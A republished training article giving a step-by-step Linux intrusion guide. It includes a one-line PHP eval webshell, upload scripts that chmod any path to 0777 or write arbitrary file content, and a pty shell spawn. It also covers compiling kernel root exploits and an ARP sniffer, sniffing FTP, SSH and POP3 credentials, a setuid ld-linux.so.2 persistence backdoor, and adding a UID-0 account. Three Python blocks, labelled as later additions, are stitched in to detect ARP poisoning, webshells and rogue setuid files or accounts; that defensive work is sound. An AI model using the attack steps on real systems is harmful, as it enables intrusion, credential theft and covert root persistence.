Step-by-Step Guide to Deploying a PHP Backdoor and Gaining Root on Linux

This article walks through creating a simple PHP backdoor, using Python to spawn an interactive shell, compiling and exploiting local binaries, leveraging ARP sniffing to capture credentials, and applying various Linux privilege‑escalation techniques to obtain root access on vulnerable systems.

MaGe Linux Operations

Creating a PHP Backdoor

Use a one‑line PHP script that evaluates data from a POST parameter, e.g.:

<?php @eval($_POST[md5])?>

Save it as rankuplog_time.php on the target server.

Obtaining an Interactive Shell

Run Python’s pty module to spawn a /bin/sh shell:

python -c 'import pty; pty.spawn("/bin/sh")'

After execution, verify the user ID with id and the kernel version with uname -r.

Linux Privilege‑Escalation Paths

Common vectors include third‑party software vulnerabilities, local trust features, and kernel overflows. Search for suitable exploits on sites such as tools.90sec.org, sebug.net, x73.cc, or exploit-db.com.

Compiling and Running Exploits

Upload the source files (e.g., 2.c) to /tmp, compile with gcc -o 2 2.c, set the executable permission (chmod +x 2), and execute the result.

For ARP sniffing, install libpcap and libnet, then compile:

gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

Run the sniffer with appropriate interface and target addresses.

Capturing Credentials

Use tcpdump to listen on the target host and write packets to a file, then analyze with Wireshark/Ethereal. Modify linsniffer.c to filter desired ports (FTP, SSH, POP3, etc.) and recompile.
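The ARP sniffing and credential capture described in the two sections above work because a poisoned ARP cache lets one host answer for another, typically the gateway, and because FTP, POP3 and similar protocols carry credentials in cleartext. From the defender's side, the poisoning leaves a visible trace in the ARP cache. The following is an added example, not code from the original article or from MaGe: it compares two constructed snapshots in the output format of `ip neigh` (the lines are made up, not captured from any host) and flags the two classic symptoms, a MAC change for a known IP and one MAC claiming several IPs. The gateway address is a placeholder.

```python
from collections import defaultdict

# Constructed ARP-cache snapshots in `ip neigh` style (not captured from any real host).
# In the second snapshot the gateway's IP resolves to the MAC already used by
# 192.168.1.50, the hallmark of a host inserting itself into gateway-bound traffic.
SNAPSHOT_BEFORE = """\
192.168.1.1 dev eth0 lladdr 00:11:22:33:44:01 REACHABLE
192.168.1.20 dev eth0 lladdr 00:11:22:33:44:20 STALE
192.168.1.50 dev eth0 lladdr 00:11:22:33:44:50 REACHABLE
"""
SNAPSHOT_AFTER = """\
192.168.1.1 dev eth0 lladdr 00:11:22:33:44:50 REACHABLE
192.168.1.20 dev eth0 lladdr 00:11:22:33:44:20 STALE
192.168.1.50 dev eth0 lladdr 00:11:22:33:44:50 REACHABLE
"""

GATEWAY_IP = "192.168.1.1"  # placeholder; use the real default gateway of the monitored segment


def parse_neigh(text):
    """Map IP -> MAC from `ip neigh`-style lines; entries without lladdr (FAILED/INCOMPLETE) are skipped."""
    table = {}
    for line in text.splitlines():
        parts = line.split()
        if "lladdr" in parts:
            table[parts[0]] = parts[parts.index("lladdr") + 1].lower()
    return table


def detect_arp_anomalies(before, after, gateway_ip=GATEWAY_IP):
    """Return human-readable alerts for MAC changes and shared MACs between two snapshots."""
    alerts = []
    old, new = parse_neigh(before), parse_neigh(after)

    # 1. Any IP whose MAC changed between snapshots; the gateway is the critical case.
    for ip, mac in new.items():
        if ip in old and old[ip] != mac:
            sev = "CRITICAL" if ip == gateway_ip else "WARN"
            alerts.append(f"{sev}: {ip} changed from {old[ip]} to {mac}")

    # 2. One MAC answering for several IPs (legitimate setups rarely do this on a LAN).
    owners = defaultdict(list)
    for ip, mac in new.items():
        owners[mac].append(ip)
    for mac, ips in owners.items():
        if len(ips) > 1:
            alerts.append(f"WARN: {mac} claims {', '.join(sorted(ips))}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_anomalies(SNAPSHOT_BEFORE, SNAPSHOT_AFTER):
        print(alert)
```

In practice the snapshots come from a periodic `ip neigh show` on the monitored hosts, and the same logic is what switch-side Dynamic ARP Inspection and tools such as arpwatch implement. The complementary mitigation is to stop cleartext protocols from carrying anything worth capturing: SFTP or FTPS instead of FTP, POP3S/IMAPS instead of POP3, and a static ARP entry for the gateway on hosts that cannot be moved behind an inspecting switch.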

Additional PHP Exploits

Upload a script that changes file permissions:

<?php
// Makes the path passed in the ?path= query parameter world-writable.
$path = stripslashes($_GET['path']);
$ok = chmod($path, 0777);
if ($ok) echo "CHMOD OK";
?>

Or a script that writes arbitrary data to a file:

<?php
// Appends the POSTed 'mess' body to the file named by the POSTed 'filename'.
$filename = stripslashes($_POST['filename']);
$mess = stripslashes($_POST['mess']);
$fp = fopen($filename, 'a');
fputs($fp, $mess);
fclose($fp);
?>
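All three PHP scripts on this page (the eval one-liner under "Creating a PHP Backdoor" and the two above) share one shape: data from a request superglobal reaches a dangerous function, either directly or through a variable that was assigned from it. That shape is what a web-root scanner looks for. The following is an added example, not code from the original article or from MaGe, written from the detection side: it performs a light taint check over constructed PHP sources (the three scripts from this page plus one benign file for contrast) and reports each sink that receives request-controlled data. The file names and the `SINKS` table are the example's own choices.

```python
import re

# Constructed PHP sources (not read from any server): the page's three scripts plus a benign one.
SAMPLES = {
    "rankuplog_time.php": "<?php @eval($_POST[md5])?>",
    "perm.php": "<?php $path = stripslashes($_GET['path']); $ok = chmod($path, 0777); ?>",
    "write.php": "<?php $f = stripslashes($_POST['filename']); $fp = fopen($f, 'a'); fputs($fp, $_POST['mess']); ?>",
    "clean.php": "<?php echo htmlspecialchars($_GET['q'] ?? ''); ?>",
}

SUPERGLOBAL = r"\$_(?:POST|GET|REQUEST|COOKIE)\b"

# Sinks grouped by the harm they enable: code execution, command execution,
# permission change, file open, file write. Extend to taste.
SINKS = {
    "eval": r"\beval\s*\(",
    "exec": r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(",
    "chmod": r"\bchmod\s*\(",
    "fopen": r"\bfopen\s*\(",
    "write": r"\b(?:fwrite|fputs|file_put_contents)\s*\(",
}


def tainted_vars(src):
    """Variables assigned (possibly through a wrapper such as stripslashes) from a request superglobal."""
    names = set()
    for m in re.finditer(r"(\$\w+)\s*=\s*[^;]*" + SUPERGLOBAL, src):
        names.add(m.group(1))
    return names


def scan_php(name, src):
    """Return (file, sink, argument-text) for every sink fed request data directly or via a tainted variable."""
    findings = []
    tainted = tainted_vars(src)
    for sink, pattern in SINKS.items():
        for m in re.finditer(pattern, src):
            start = m.end()
            close = src.find(")", start)  # first ')' suffices for the one-line scripts here
            arg = src[start:close] if close != -1 else src[start:]
            direct = re.search(SUPERGLOBAL, arg) is not None
            via_var = any(re.search(re.escape(v) + r"\b", arg) for v in tainted)
            if direct or via_var:
                findings.append((name, sink, arg.strip()))
    return findings


def scan_all(samples=SAMPLES):
    """Scan every sample; a real run would read each *.php under the web root into this dict."""
    return {name: scan_php(name, src) for name, src in samples.items()}


if __name__ == "__main__":
    for name, hits in scan_all().items():
        print(name, "->", hits or "clean")
```

This is a heuristic, not a parser: it catches the plain request-to-sink pattern these scripts use, and a shell that hides the sink behind string decoding or variable function names will not be matched. Pair it with file-integrity monitoring of the web root, since a PHP file that appeared without a deployment is suspicious whatever it contains, and with a web server running under an account that cannot chmod or write outside its upload directory, which is what makes the two scripts above fail even when they are present.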

Kernel‑Based Local Root Exploits

Examples include the 2.6.19 udp_sendmsg exploit and udev privilege escalation for kernels 2.6.*. After compiling the exploit (e.g., pwnkernel.c), execute to obtain a root shell.

Post‑Exploitation: Installing a Persistent Backdoor

Copy /lib/ld-linux.so.2 to a writable location, set the set‑uid bit, and execute it to regain root privileges later.

Modify system files such as /etc/passwd, /etc/shadow, or use sed to replace the root UID for a new user.
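Both persistence methods in this section leave artifacts that a host audit can find: a setuid copy of a system binary sitting where package managers never put one, and a second account whose UID field is 0. The following is an added example, not code from the original article or from MaGe, showing the two checks over constructed data: an /etc/passwd excerpt and an inventory of (path, st_mode) pairs of the kind os.lstat() produces when walked over a filesystem. The account name, paths and the list of trusted setuid directories are the example's own assumptions.

```python
import stat

# Constructed /etc/passwd excerpt (not from any real host). The last line is a
# second UID-0 account of the kind the sed trick above produces.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup2:x:0:0::/tmp:/bin/sh
"""

# Constructed (path, st_mode) inventory, as os.lstat(path).st_mode would return it.
# 0o104755 = regular file, setuid bit set, rwxr-xr-x. The copy of ld-linux.so.2 under
# /tmp with the setuid bit is the backdoor described in this section.
FILE_INVENTORY = [
    ("/usr/bin/passwd", 0o104755),
    ("/lib/ld-linux.so.2", 0o100755),
    ("/tmp/.x/ld-linux.so.2", 0o104755),
    ("/var/www/html/index.php", 0o100644),
]

# Directories where distribution packages legitimately install setuid programs (assumption).
TRUSTED_SUID_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")


def uid0_accounts(passwd_text):
    """Names of accounts other than root whose UID field is 0, i.e. root-equivalent logins."""
    rogue = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 7 and fields[2] == "0" and fields[0] != "root":
            rogue.append(fields[0])
    return rogue


def suspicious_suid(inventory):
    """Regular files with the setuid bit outside the trusted directories."""
    hits = []
    for path, mode in inventory:
        is_suid = stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)
        if is_suid and not path.startswith(TRUSTED_SUID_DIRS):
            hits.append(path)
    return hits


if __name__ == "__main__":
    print("extra UID-0 accounts:", uid0_accounts(PASSWD_SAMPLE))
    print("setuid files in untrusted locations:", suspicious_suid(FILE_INVENTORY))
```

On a live host the inventory comes from walking the filesystem with os.lstat(), or from `find / -perm -4000 -type f`, and the baseline of expected setuid files should be taken from package metadata (`rpm -V` or `dpkg --verify`) rather than a directory prefix list, which catches a tampered binary inside a trusted directory as well. Both checks are cheap enough to run from cron and diff against the previous result.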

Useful System Commands

ifconfig – view network interfaces
netstat -an | grep :80 – check listening ports
service --status-all – list running services
lsb_release -a – display distribution info
sshd stop/start – control SSH daemon

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.

Written by

MaGe Linux Operations

Founded in 2009, MaGe Education is a top Chinese high‑end IT training brand. Its graduates earn 12K+ RMB salaries, and the school has trained tens of thousands of students. It offers high‑pay courses in Linux cloud operations, Python full‑stack, automation, data analysis, AI, and Go high‑concurrency architecture. Thanks to quality courses and a solid reputation, it has talent partnerships with numerous internet firms.
